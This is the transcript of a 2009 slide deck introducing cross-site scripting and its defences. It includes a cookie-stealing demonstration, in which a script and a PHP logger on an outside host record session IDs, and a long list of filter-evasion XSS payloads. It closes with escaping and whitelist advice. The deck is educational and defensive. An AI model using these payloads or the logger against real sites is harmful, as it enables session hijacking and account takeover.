XSS: An Introduction and Demonstration (2009)

XSS
An Introduction and
Attack Demonstration

View Slide

XSS: An Introduction

“Cross-Site Scripting”

Using client-side code to send sensitive
information off to far-away places.

eg. Javascript

View Slide

Bobby Tables

View Slide

<br/><script>Mallory</td><br/>Oh shit.<br/>

View Slide


That http://hax.gd/x.js script could be:
alert('HA HA.');
alert('Survive make your time.');

View Slide


document.write(document.cookie);

View Slide


document.write(
'style="display:none;" />');
style="display:none;" />Mallory

View Slide


Let's have a look at http://hax.gd/x.php:
$fh=fopen('xss.log','a');
fwrite($fh,$_SERVER['HTTP_REFERER'].
var_export($_GET,1)); fclose($fh);
http://example/cms/objects.php?
_obj_name=example_data&_subnav=123
array('award_visited=1;__csuid=blah;
_PHPSESSID=t57tm1fvvdhonprigkdon7167
7' => '',)

View Slide


So what?
http://example/cms/objects.php?
_obj_name=example_data&_subnav=123
array('award_visited=1;__csuid=blah;
_PHPSESSID=
t57tm1fvvdhonprigkdon71677
' => '',)

View Slide


Steal the cookie.

Get the URL to the admin screen.

Log in at will, exposing the very soft underbelly.

Time for a demo.

View Slide

View Slide

Filtering and Escaping

Sometimes are conflated, with side-effects
being things like backslashes or entity tags
found in stored data.

This is all very well and good, but what happens
if you want to put this into an email message or
save out to a text document?

“Strip out all tags!” can result in mangled
content:

eg. <3, , 1 < x < 5, “if foo <> bar then”

View Slide


Validation & Filtering: Checking for and getting
rid of the nasties.

Checking data is of the correct type, eg.
email addresses, postcodes, message text.

Stripping out control characters, fixing multibyte
encoding shenanigans with iconv().

Escaping: Packaging data up for transport.

mysql_real_escape_string() for MySQL strings.

htmlentities($x, ENT_QUOTES, 'UTF-8'); for HTML.

urlencode() for query params.

View Slide


Why don't we just kill any tags we find?<br/><IMG SRC=javascript:alert('a')><br/><img src=javascript:alert("a")><br/><img “””><script>alert('a')”>
ipt:aler
t('XSS')>
ipt:aler
t('XSS')>

alert('a')

<alert("a");//<
RIPT>alert('a');RIPT>

<br/><img src=”javascript:alert('a')”<br/><IMG<br/>SRC<br/>=<br/>"<br/>j<br/>a<br/>v<br/>a<br/>s<br/>c<br/>r<br/>i<br/>p<br/>t<br/>:<br/>a<br/>l<br/>e<br/>r<br/>t<br/>(<br/>'<br/>a<br/>'<br/>)<br/>"<br/>><br/>

View Slide


Why don't we just kill any tags we find?<br/><iframe src=http://foo/x.html <<br/><body background=”javascript:alert('a')”><br/><BODY ONLOAD=alert('a')><br/><img dynsrc=”javascript:alert('a')”><br/><img lowsrc=”javascript:alert('a')”><br/><BGSOUND SRC=javascript:alert('a')><br/><BR SIZE=”&{alert('a')}”><br/><LAYER SRC=”http://foo/x.html”></LAYER><br/><link rel=”stylesheet” href=”javascript:alert('a');”><br/><XSS STYLE="behavior: url(xss.htc);"><br/><STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE><br/><IMG SRC='vbscript:msgbox(“a”)'><br/><img src=”livescript:alert('a')”><br/>žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)<br/><META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert('a');”><br/><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,<br/>PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><br/><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET><br/><TABLE BACKGROUND="javascript:alert('XSS')"><br/>

View Slide


Why don't we just kill any tags we find?<br/><DIV STYLE="background-image: url(javascript:alert('a'))"><br/><DIV STYLE="background-image:\0075\0072\006C\0028'\006a<br/>\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061<br/>\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><br/><DIV STYLE="background-image: url(javascript:alert('a'))"><br/><DIV STYLE="width: expression(alert('a'));"><br/><STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE><br/><IMG STYLE="xss:expr/*XSS*/ession(alert('a'))"><br/>exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("a"))'><br/><STYLE TYPE="text/javascript">alert('a');</STYLE><br/><STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A><br/><BASE HREF="javascript:alert('a');//"><br/><OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT><br/><EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED><br/><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg=="<br/>type="image/svg+xml" AllowScriptAccess="always"></EMBED><br/><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]><br/></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><br/>

View Slide


Yeah, no.

The transport is HTML; package it
appropriately.

Using htmlentities($xsslol, ENT_QUOTES, 'UTF-8')
will completely neuter most of this stuff.

Use it even on the things you “trust” like
$_SERVER['PHP_SELF'], or REQUEST_URI.

It gets hard when you need to put user data into
src=”” and style=”” fields; suggest using a whitelist
instead, no matter how much of a pain it is to
implement. (Or in the case of images and other
files, generating the filename for them.)

View Slide

XSS: An Introduction and Demonstration (2009)

XSS: An Introduction and Demonstration (2009)

Rob Howard

More Decks by Rob Howard

Other Decks in Technology

Featured

Transcript